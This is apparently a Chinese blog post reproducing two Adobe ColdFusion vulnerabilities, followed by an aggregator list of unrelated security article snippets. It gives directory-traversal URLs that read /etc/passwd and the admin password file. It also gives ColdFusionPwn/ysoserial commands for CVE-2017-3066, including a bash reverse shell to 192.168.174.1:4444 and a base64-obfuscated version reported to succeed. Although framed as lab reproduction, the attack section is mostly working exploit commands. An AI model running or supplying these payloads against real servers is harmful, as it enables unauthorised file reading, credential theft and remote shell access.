代码编织梦想

CVE-2010-2861)Adobe ColdFusion 文件读取漏洞

一、漏洞简介
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
二、漏洞影响
Adobe ColdFusion 8
Adobe ColdFusion 9
三、漏洞复现
直接访问http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可读取文件/etc/passwd:

在这里插入图片描述

读取后台管理员密码http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
在这里插入图片描述

coldfusion反序列化漏洞(CVE-2017-3066)

漏洞详情:
Adobe ColdFusion是美国奥多比(Adobe)公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
漏洞影响
Adobe ColdFusion (2016 release) Update 3及之前的版本,
ColdFusion 11 Update 11及之前的版本,
ColdFusion 10 Update 22及之前的版本。
漏洞复现:
建议使用linux生成poc,windows会出现报错。
这里是让他在tmp文件夹中创建一个名为lin的文件


java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/lin' poc.ser

在这里插入图片描述

生成poc.ser文件后,
在这里插入图片描述

将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf
具体操作呢,先通过bp抓到一个get请求包
在这里插入图片描述
然后变更请求方式
在这里插入图片描述

再把在linux生成的poc文件拉到window上,再通过bp黏贴到包中(如果你是用linux做的就直接bp抓包然后按以下操作就行),
在这里插入图片描述
发送包,返回200,到靶场中查看一下
在这里插入图片描述
在这里插入图片描述

lin文件成功创建,漏洞利用成功
那就试试直接把touch命令改为bash命令试一下能不能反弹shell

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -i >& /dev/tcp/192.168.174.1/4444 0>&1 ' poc.ser

在这里插入图片描述

虽然返回的是200,但是没有反弹成功。

拿到http://www.jackson-t.ca/runtime-exec-payloads.html这里把bash命令加密一下
bash -i >& /dev/tcp/192.168.174.1/4444 0>&1
在这里插入图片描述

在linux中重新生成一个poc.ser,按上边步骤再来一次。

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 ' bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xLzQ0NDQgMD4mMSA=}|{base64,-d}|{bash,-i} ' poc.ser

在这里插入图片描述

成功反弹shell

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/weixin_43071873/article/details/110946530

CISSP考试要求里的“应用密码学”内容辅助记忆趣味串讲-爱代码爱编程

前言 密码学为数据的处理、存储和通信过程提供附加的安全级别。近年来,数学家和计算机科学家开发了一系列日益复杂的算法,这些算法被设计用于确保机密性、完整性、身份认证和不可否认性。在密码学家花费大量时间开发强加密算法的同时, 黑客们和政府同样投入了可观的资源来破解这些密码学算法。这产生了密码学领域的"军备竞赛",并且导致如今使用的极其精密的算法的不断发展

7个安全认证资料包给你白嫖-爱代码爱编程

今天搬砖不狠,明天地位不稳。   《2020中国网络安全企业100强报告》有三句话 未来十年,中国网络安全时长规模将增长十倍;未来十年,完了过安全会成为优先级最高的IT投资;未来十年,网络安全将成为第一生产力。  网络安全越加重要已是未来的趋势所向。而且一个行业成熟是有其特点和规律的,比如安全行业:越来越细分,大家可以看看现在安全圈很多人创业

微软十二月补丁星期二修复58个漏洞-爱代码爱编程

 聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 今天,微软发布12月补丁星期二,修复了共计58个漏洞和一个关于微软产品的安全通告。在58个漏洞中,9个为“严重”级别,48个为“重要”级别,而2个为“中危”级别。 这次更新并不包含 0day 或此前已披露漏洞。 微软发布了由清华大学-奇安信联合团队以及加利福尼亚大学的安

sqli-libs less1(union 字符注入)-爱代码爱编程

打开后,提示输入id并赋值 1、寻找注入点 输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞 根据报错信息,猜想输入参数的值被放到一对单引号之间。 猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测): SELECT * FROM users WHERE id='$id' LIMIT 0,1 2、order

自适应安全:知己重于知彼-爱代码爱编程

“善攻者,敌不知其所守;善守者,敌不知其所攻。”——《孙子・虚实篇》 在网络安全的攻防对抗中,攻击者往往占据主动地位,攻击者可以选择有利时机,采用各种技术或社交欺骗战术,掩盖自己的攻击行为、过程和目标,做到瞒天过海,攻其不备;而防守者则想方设法完善自己的防护体系,力图做到滴水不漏…… 然而现实却是,在互联网和数字经济的浪潮下,业务数字化也在迅速发展,企

CTF小白学习笔记(Reverse)-i春秋 NoExec-爱代码爱编程

大纲 一.解题过程预处理DOS ME头IMAGE_DOS_HEADERPE文件头找到入口分析check函数字符串按索引奇偶分成2个字符串将2个字符串base64编码后拼接将拼接后的字符串DES加密再一次base64二.解题脚本三.总结 一.解题过程 这道题涉及到的有windows PE文件头相关的知识,以及base64和DES算法,这个exe

ActiveMQ反序列化漏洞(CVE-2015-5254)复现-爱代码爱编程

ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 导语 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中

SQL数据库中了.chch后缀勒索病毒如何解决?-爱代码爱编程

  什么是chch勒索病毒? Chch由GrujaRS发现,是勒索病毒感染。该恶意软件旨在对数据进行加密,并要求为解密工具/软件支付赎金。Chch加密时,所有受影响的文件都使用“ .chch ”扩展名重命名。例如,“ 1.jpg ”在加密后将显示为“ 1.jpg.chch ”。此过程完成后,文本文件(“ READ_ME.TXT ”)存储在桌面上。该文件

java反序列化漏洞测试-爱代码爱编程

java反序列化漏洞测试 反序列化漏洞测试类正式测试 反序列化漏洞 package com.lcw.demo; import java.io.*; import java.util.HashMap; import java.util.Map; // 用到的commons.collections包 import com.alibaba.fas

CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现-爱代码爱编程

目录   1. 简介 2. 影响范围 3. 环境搭建 3.1 安装Composer 4. 漏洞复现 4.1 列举目录 4.2 任意文件读取 1. 简介 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 2. 影响范围

前端安全(2):跨站脚本(Cross-Site Scripting,XSS)-爱代码爱编程

一、XSS分为哪几类? 根据攻击的来源,XSS攻击可分为储存型、反射型、和DOM型三种 储存区:恶意代码存放的位置。插入点:由谁取得恶意代码,并插入到网页上。1. 储存型XSS 储存型XSS的攻击步骤: 攻击者将恶意代码提交到目标网站的数据库中。⽤户打开⽬标网站时,网站服务端将恶意代码从数据库取出,拼接在 HTML 中返回给浏览器。⽤户浏览器接收到

前端安全(3):预防跨站脚本(Cross-Site Scripting,XSS)-爱代码爱编程

一、如何预防XSS XSS 攻击有两⼤要素: 攻击者提交恶意代码。 浏览器执⾏恶意代码。 针对第⼀个要素:我们是否能够在⽤户输⼊的过程,过滤掉⽤户输⼊的恶意代码呢? 输入过滤 在⽤户提交时,由前端过滤输⼊,然后提交到后端。这样做是否可⾏呢? 答案是不可⾏。⼀旦攻击者绕过前端过滤,直接构造请求,就可以提交恶意代码了。 那么,换⼀个过滤时机:后端在